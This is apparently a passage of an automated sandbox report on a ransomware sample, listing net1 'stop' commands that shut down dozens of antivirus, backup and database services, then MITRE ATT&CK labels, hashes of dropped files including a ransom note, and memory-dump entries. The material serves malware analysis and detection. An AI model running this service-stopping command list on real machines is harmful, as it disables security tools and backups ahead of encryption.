C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:6024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
1⤵
PID:5000

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
1⤵
PID:4828

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
1⤵
PID:14328

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
1⤵
PID:14320

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SntpService /y
1⤵
PID:14312

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
1⤵
PID:14304

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
1⤵
PID:14296

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
1⤵
PID:14288

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:14280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
1⤵
PID:14264

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
1⤵
PID:14256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
1⤵
PID:14248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
1⤵
PID:14240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
1⤵
PID:14232

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
1⤵
PID:14224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:14216

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:14208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
1⤵
PID:14200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
1⤵
PID:14192

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
1⤵
PID:14184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
1⤵
PID:14176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
1⤵
PID:14168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
1⤵
PID:14160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
1⤵
PID:14152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:14144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
1⤵
PID:14136

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
1⤵
PID:14128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
1⤵
PID:14120

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
1⤵
PID:14108

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
1⤵
PID:14100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
1⤵
PID:14092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
1⤵
PID:10016

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:9796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
1⤵
PID:10152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
1⤵
PID:6392

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
1⤵
PID:11184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
1⤵
PID:4780

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
1⤵
PID:10420

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
1⤵
PID:9108

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
1⤵
PID:10216

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
1⤵
PID:13176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
1⤵
PID:13168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
1⤵
PID:13160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
1⤵
PID:13152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:13144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
1⤵
PID:13136

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
1⤵
PID:13128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
1⤵
PID:13120

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
1⤵
PID:13104

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
1⤵
PID:13112

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
1⤵
PID:13096

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
1⤵
PID:13088

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
1⤵
PID:13048

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
1⤵
PID:13040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
1⤵
PID:13032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
1⤵
PID:13024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
1⤵
PID:13016

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
1⤵
PID:13008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
1⤵
PID:13000

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:12992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
1⤵
PID:12984

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:12976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
1⤵
PID:12968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:12960

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
1⤵
PID:12952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
1⤵
PID:12944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:12936

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
1⤵
PID:12928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:12920

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
1⤵
PID:12908

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
1⤵
PID:12904

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
1⤵
PID:12896

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:12888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
1⤵
PID:12880

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
1⤵
PID:12872

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
1⤵
PID:12864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
1⤵
PID:12856

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
1⤵
PID:12848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
1⤵
PID:12840

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
1⤵
PID:12832

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:12824

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:12812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
1⤵
PID:12796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
1⤵
PID:12792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
1⤵
PID:12784

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
1⤵
PID:12776

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
1⤵
PID:12768

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
1⤵
PID:12760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
1⤵
PID:12752

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
1⤵
PID:12744

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
1⤵
PID:12736

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
1⤵
PID:12728

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
1⤵
PID:12720

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
1⤵
PID:12712

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
1⤵
PID:12704

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:12696

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:12684

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
1⤵
PID:12676

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
1⤵
PID:12644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
1⤵
PID:12592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
1⤵
PID:12468

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
1⤵
PID:12460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
1⤵
PID:12452

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
1⤵
PID:12444

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
1⤵
PID:12436

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:12428

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
1⤵
PID:12420

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
1⤵
PID:12412

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
1⤵
PID:12404

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
1⤵
PID:12396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
1⤵
PID:12388

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:12380

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
1⤵
PID:12140

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
1⤵
PID:12148

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
1⤵
PID:12084

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
1⤵
PID:12076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
1⤵
PID:12132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
1⤵
PID:12124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
1⤵
PID:12116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
1⤵
PID:12156

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
1⤵
PID:12100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
1⤵
PID:12092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
1⤵
PID:12104

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
1⤵
PID:12164

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
1⤵
PID:12064

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
1⤵
PID:12060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop masvc /y
1⤵
PID:12016

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
1⤵
PID:12008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
1⤵
PID:11992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
1⤵
PID:11984

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
1⤵
PID:11976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
1⤵
PID:11472

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
1⤵
PID:6916

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
1⤵
PID:6500

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
1⤵
PID:12884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MMS /y
1⤵
PID:8284

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
1⤵
PID:7600

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
1⤵
PID:6756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
1⤵
PID:6172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:7636

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
1⤵
PID:4580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
1⤵
PID:15736

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:7312

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
1⤵
PID:15784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
1⤵
PID:15608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SamSs /y
1⤵
PID:14188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
1⤵
PID:5040

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:7816

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
1⤵
PID:8120

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5052

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
1⤵
PID:6536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
1⤵
PID:5716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
1⤵
PID:8740

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:6720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
1⤵
PID:5240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
1⤵
PID:10784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:8860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
1⤵
PID:11024

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
1⤵
PID:10996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
1⤵
PID:12320

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
1⤵
PID:9776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
1⤵
PID:6044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
1⤵
PID:8456

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
1⤵
PID:9656

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:8440

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
1⤵
PID:8888

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:7852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
1⤵
PID:10184

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
1⤵
PID:7348

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:8416

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:9356

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5612

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:10908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
1⤵
PID:14656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
1⤵
PID:11480

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
1⤵
PID:9296

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:4076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
1⤵
PID:14456

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
1⤵
PID:5240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:4176

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
39fc5a447476cfbb69ab66c9a1f82db4

SHA1
779389b3da4b7d377a8794b1e01a4665ee345ea0

SHA256
44eafbc98c8cc6a22f3997d09a69e192707eaf0c153f0f179984076cf8a01ca3

SHA512
34b5e3da149bb5ea0ac7f657f88e2d957d2491dddcd26648835e2e67bd0110dff740eb4266a3b256cf23ee53014f1432397b52fa0a307ae83863e470ab4328d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
cc9dd3c987bed1f7ae0cfd1f22a1c438

SHA1
d6de3c538f13c99118409eb49cbba539c6e93172

SHA256
0d058524bc53c1ddea052df82db713928ac8f4086f6778e72237fffb0162a128

SHA512
31bd2b17551025a223ffd97abca9ee6190a22b7e04bd5e9972a5a1dd09c4422cd51d3f9d5ab488628d69b0f08a1cf0d8fdc48d537060d3d77582286a5551becf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

MD5
05fc8994caac6e61867e90998733097e

SHA1
fc114e632cc6af2e62cffe1a18114b53f13fe5b7

SHA256
cbceb8fba29102db14dc272ec6b6ba1ba017ecfc3d3de0fd50f7582f81ff39ce

SHA512
d6b3a060e1a01735076b496b269e195b5641d82e239864d15d1d4bba8961b4b5226d429f8550da8786630644e8cb2f4fdd7ba7932e99f50866302a1012e7744e

Download Submit
C:\Users\Admin\AppData\Local\Temp\z0scf5zo.exe

MD5
c590a84b8c72cf18f35ae166f815c9df

SHA1
b97761358338e640a31eef5e5c5773b633890914

SHA256
57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4

SHA512
dc657393b96477d6dd51ec87a5adce53d6897ad9cd40c2a4e324284fb71c7b858e4e83ff61ae9c0e60e8c333875481dfb08f73a7121e36e997bac4da54250018

Download Submit
C:\Users\Admin\AppData\Local\Temp\z0scf5zo.exe

MD5
c590a84b8c72cf18f35ae166f815c9df

SHA1
b97761358338e640a31eef5e5c5773b633890914

SHA256
57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4

SHA512
dc657393b96477d6dd51ec87a5adce53d6897ad9cd40c2a4e324284fb71c7b858e4e83ff61ae9c0e60e8c333875481dfb08f73a7121e36e997bac4da54250018

Download Submit
memory/1392-189-0x0000000000000000-mapping.dmp

Download
memory/1392-234-0x0000000000000000-mapping.dmp

Download
memory/1432-186-0x0000000000000000-mapping.dmp

Download
memory/1508-184-0x0000000000000000-mapping.dmp

Download
memory/1560-243-0x0000000000000000-mapping.dmp

Download
memory/1644-221-0x0000000000000000-mapping.dmp

Download
memory/2024-129-0x0000000008200000-0x0000000008201000-memory.dmp

Filesize
4KB

Download
memory/2024-122-0x00000000079F0000-0x00000000079F1000-memory.dmp

Filesize
4KB

Download
memory/2024-139-0x0000000009830000-0x0000000009863000-memory.dmp

Filesize
204KB

Download
memory/2024-146-0x0000000009810000-0x0000000009811000-memory.dmp

Filesize
4KB

Download
memory/2024-151-0x0000000009BC0000-0x0000000009BC1000-memory.dmp

Filesize
4KB

Download
memory/2024-152-0x000000007EFF0000-0x000000007EFF1000-memory.dmp

Filesize
4KB

Download
memory/2024-153-0x0000000009D50000-0x0000000009D51000-memory.dmp

Filesize
4KB

Download
memory/2024-183-0x00000000073B3000-0x00000000073B4000-memory.dmp

Filesize
4KB

Download
memory/2024-130-0x0000000008AB0000-0x0000000008AB1000-memory.dmp

Filesize
4KB

Download
memory/2024-123-0x00000000078F0000-0x00000000078F1000-memory.dmp

Filesize
4KB

Download
memory/2024-124-0x00000000080D0000-0x00000000080D1000-memory.dmp

Filesize
4KB

Download
memory/2024-126-0x0000000008390000-0x0000000008391000-memory.dmp

Filesize
4KB

Download
memory/2024-127-0x00000000073B0000-0x00000000073B1000-memory.dmp

Filesize
4KB

Download
memory/2024-118-0x0000000000000000-mapping.dmp

Download
memory/2024-121-0x00000000072D0000-0x00000000072D1000-memory.dmp

Filesize
4KB

Download
memory/2024-128-0x00000000073B2000-0x00000000073B3000-memory.dmp

Filesize
4KB

Download
memory/2024-131-0x0000000008B30000-0x0000000008B31000-memory.dmp

Filesize
4KB

Download
memory/2248-235-0x0000000000000000-mapping.dmp

Download
memory/2248-190-0x0000000000000000-mapping.dmp

Download
memory/2824-188-0x0000000000000000-mapping.dmp

Download
memory/3264-191-0x0000000000000000-mapping.dmp

Download
memory/3344-185-0x0000000000000000-mapping.dmp

Download
memory/3488-187-0x0000000000000000-mapping.dmp

Download
memory/3940-227-0x0000000000000000-mapping.dmp

Download
memory/4064-114-0x0000000000810000-0x0000000000811000-memory.dmp

Filesize
4KB

Download
memory/4064-117-0x0000000005060000-0x0000000005061000-memory.dmp

Filesize
4KB

Download
memory/4064-116-0x0000000005070000-0x0000000005071000-memory.dmp

Filesize
4KB

Download
memory/4116-192-0x0000000000000000-mapping.dmp

Download
memory/4148-193-0x0000000000000000-mapping.dmp

Download
memory/4164-225-0x0000000000000000-mapping.dmp

Download
memory/4176-242-0x0000000000000000-mapping.dmp

Download
memory/4204-230-0x0000000000000000-mapping.dmp

Download
memory/4212-194-0x0000000000000000-mapping.dmp

Download
memory/4220-222-0x0000000000000000-mapping.dmp

Download
memory/4240-195-0x0000000000000000-mapping.dmp

Download
memory/4252-240-0x0000000000000000-mapping.dmp

Download
memory/4268-196-0x0000000000000000-mapping.dmp

Download
memory/4272-229-0x0000000000000000-mapping.dmp

Download
memory/4300-236-0x0000000000000000-mapping.dmp

Download
memory/4300-197-0x0000000000000000-mapping.dmp

Download
memory/4308-223-0x0000000000000000-mapping.dmp

Download
memory/4340-241-0x0000000000000000-mapping.dmp

Download
memory/4360-224-0x0000000000000000-mapping.dmp

Download
memory/4372-198-0x0000000000000000-mapping.dmp

Download
memory/4380-226-0x0000000000000000-mapping.dmp

Download
memory/4404-199-0x0000000000000000-mapping.dmp

Download
memory/4440-228-0x0000000000000000-mapping.dmp

Download
memory/4448-233-0x0000000000000000-mapping.dmp

Download
memory/4452-200-0x0000000000000000-mapping.dmp

Download
memory/4460-232-0x0000000000000000-mapping.dmp

Download
memory/4496-201-0x0000000000000000-mapping.dmp

Download
memory/4540-202-0x0000000000000000-mapping.dmp

Download
memory/4576-231-0x0000000000000000-mapping.dmp

Download
memory/4584-203-0x0000000000000000-mapping.dmp

Download
memory/4624-204-0x0000000000000000-mapping.dmp

Download
memory/4656-205-0x0000000000000000-mapping.dmp

Download
memory/4692-206-0x0000000000000000-mapping.dmp

Download
memory/4748-237-0x0000000000000000-mapping.dmp

Download
memory/4756-207-0x0000000000000000-mapping.dmp

Download
memory/4788-208-0x0000000000000000-mapping.dmp

Download
memory/4804-209-0x0000000000000000-mapping.dmp

Download
memory/4828-210-0x0000000000000000-mapping.dmp

Download
memory/4868-211-0x0000000000000000-mapping.dmp

Download
memory/4888-212-0x0000000000000000-mapping.dmp

Download
memory/4896-238-0x0000000000000000-mapping.dmp

Download
memory/4924-213-0x0000000000000000-mapping.dmp

Download
memory/4932-239-0x0000000000000000-mapping.dmp

Download
memory/4940-214-0x0000000000000000-mapping.dmp

Download
memory/4972-215-0x0000000000000000-mapping.dmp

Download
memory/5028-216-0x0000000000000000-mapping.dmp

Download
memory/5044-217-0x0000000000000000-mapping.dmp

Download
memory/5052-218-0x0000000000000000-mapping.dmp

Download
memory/5092-219-0x0000000000000000-mapping.dmp

Download
memory/5108-220-0x0000000000000000-mapping.dmp

Download
memory/5124-244-0x0000000000000000-mapping.dmp

Download
memory/5136-278-0x000002A1F8DF0000-0x000002A1F8DF2000-memory.dmp

Filesize
8KB

Download
memory/5136-279-0x000002A1F8DF3000-0x000002A1F8DF5000-memory.dmp

Filesize
8KB

Download
memory/5172-245-0x0000000000000000-mapping.dmp

Download
memory/5224-246-0x0000000000000000-mapping.dmp

Download
